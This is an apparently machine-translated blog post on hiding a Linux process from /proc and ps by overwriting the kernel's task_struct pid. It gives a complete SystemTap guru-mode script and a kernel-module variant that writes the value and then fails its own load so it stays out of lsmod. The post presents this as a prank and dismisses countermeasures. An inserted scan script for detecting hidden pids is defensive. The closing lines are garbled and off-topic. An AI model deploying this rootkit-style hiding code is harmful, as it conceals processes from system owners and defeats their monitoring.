One line of code hides a Linux process

Friends often ask me how to hide a Linux process. My reply is always: hidden to what extent, from the kernel or from the user?

Everything you find on the Internet boils down to hooking procfs or similar user-space tricks, and the discussion inevitably gets long. To me those approaches are too big and too complicated: someone who just wants to see the effect right away is likely to be put off by such a pile of machinery.

This article introduces an unconventional method of hiding a Linux process from users, with just one line of code:

  • Just modify the pid of the process.

Note that this is only a small-time hiding trick, not worth countering, so it is fine for a senior engineer to pull as a prank.

target->pid = 0x7fffffff;

The complete SystemTap script (guru mode, since it embeds C) is as follows:

#!/usr/bin/stap -g
# hide.stp
# Usage: ./hide.stp <pid>
# -g enables guru mode, which the embedded C below needs; run as root.

global pid;

# Look up the task by pid and overwrite task_struct->pid from embedded C.
function hide(who:long)
%{
	struct task_struct *target;

	rcu_read_lock();
	target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
	if (target)
		/* the one line: give the task a pid number no real process can have */
		target->pid = 0x7fffffff;
	rcu_read_unlock();
	if (!target)
		STAP_ERROR("no such pid");
%}

probe begin
{
	# $1 is the first command-line argument: the pid to hide
	pid = $1
	hide(pid);
	exit();
}

Let's try it (the script takes the pid to hide as its argument):

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp 403
[root@localhost system]# 

Use the following loop to list every process that /proc shows, together with the binary behind it:

for pid in $(ls /proc | awk '/^[0-9]+$/ {print $1}'); do 
	ls -l /proc/$pid/exe; 
done

The /proc entry for tohide no longer appears, and since ps enumerates /proc the same way, it certainly cannot show the process either.
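As an added example (not code from the original post), here is a check that goes one step beyond the loop above: instead of trusting the /proc listing, it probes every pid number directly and reports any pid the kernel acknowledges but readdir does not show. It assumes that the hide only affects the directory listing, i.e. that `kill -0 N` and a direct lookup of /proc/N still resolve the pid through the kernel's pid table; on a kernel where they do not, it simply reports nothing. The function names are mine.

```shell
#!/bin/sh
# Added example, not code from the original post: look for processes that the
# kernel acknowledges but that are missing from the /proc directory listing.
# Assumption: the hide only affects readdir(/proc); `kill -0 N` and a direct
# lookup of /proc/N still resolve the pid. Run as root so kill -0 is not refused.

# Pids that the /proc listing shows (this is all that ps, top and `ls /proc` use).
listed_pids() {
    ls /proc | awk '/^[0-9]+$/' | sort
}

# Pids that exist according to a direct per-number probe, without readdir.
# Keep only thread-group leaders (Tgid == pid) so that ordinary threads are
# not reported as hidden; a pid that answers kill -0 but whose /proc/N does not
# resolve at all is reported too. This walks every number up to pid_max, so it
# is slow but exhaustive.
probed_pids() {
    max=$(cat /proc/sys/kernel/pid_max)
    n=1
    while [ "$n" -le "$max" ]; do
        if kill -0 "$n" 2>/dev/null; then
            tgid=$(awk '/^Tgid:/ { print $2 }' "/proc/$n/status" 2>/dev/null)
            if [ -z "$tgid" ] || [ "$tgid" = "$n" ]; then
                echo "$n"
            fi
        fi
        n=$((n + 1))
    done | sort
}

# Pure comparison step: print every pid present in the probe list ($2) but
# absent from the readdir list ($1). Both are files with one pid per line, in
# any order; comm needs them sorted the same way, so sort them here.
pids_missing_from_listing() {
    a=$(mktemp) || return 1
    b=$(mktemp) || { rm -f "$a"; return 1; }
    sort "$1" > "$a"
    sort "$2" > "$b"
    comm -13 "$a" "$b"
    rm -f "$a" "$b"
}

# Report each hidden candidate with the binary behind it, when readable.
report_hidden() {
    l=$(mktemp); p=$(mktemp)
    listed_pids > "$l"
    probed_pids > "$p"
    for pid in $(pids_missing_from_listing "$l" "$p"); do
        printf 'hidden candidate: pid %s exe=%s\n' "$pid" \
            "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
    done
    rm -f "$l" "$p"
}

# Only scan when asked to; sourcing the file just defines the functions.
if [ "${1:-}" = "--scan" ]; then
    report_hidden
fi
```

Run it as `sh find_hidden.sh --scan`. The comparison is split out into `pids_missing_from_listing` so the probe and listing steps can be captured once and diffed repeatedly; with the hidden tohide from the transcript above, the expected output is a single "hidden candidate" line for pid 403.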

If SystemTap's guru mode looks odd to you, write a small standalone kernel module instead and use the "modify, then return an error" pattern: do the write in the module's init function and return a failure code, so insmod reports an error and the module is never actually loaded (it never shows up in lsmod), while the modified pid stays:

	target->pid = 0x7fffffff;	/* the same one line, inside module_init; any unused value works */
	return -1;			/* "fail" the load: the write persists, the module does not */

Isn't this far simpler than the various hook methods? The idea is: touch the data, not the code.

Briefly, the principle:

  • /proc does not keep a persistent directory per task; the /proc/<pid> entries are generated on demand from the kernel's task and pid tables whenever /proc is read.
  • When the listing is generated, the kernel walks the pid table and, for each entry, decides from the task's pid numbers whether it is a process (a thread group leader) that should be shown, and under which name.
  • After the write, the task carries a pid number (0x7fffffff, or any other value no real process can have, since pid_max never exceeds 4194304) that matches nothing the listing code expects, so no /proc/<pid> entry is produced for it.

Exactly which code path consults task_struct->pid, as opposed to the struct pid the task hangs off, differs between kernel versions, so re-run the /proc scan above on your own kernel rather than assuming the result carries over.

Not much to say.

Again, don't bother countering the method described in this article; something this simple is not worth countering at all, haha, is it?

For a deeper look at how Linux processes hide inside the kernel, see my earlier Rootkit series of articles, where I also give countermeasures for each method.

Not many people play chess with me; I would like to give it a try.


The leather shoes in Wenzhou, Zhejiang are wet, so they won’t get fat in the rain.


Origin: blog.csdn.net/dog250/article/details/108032383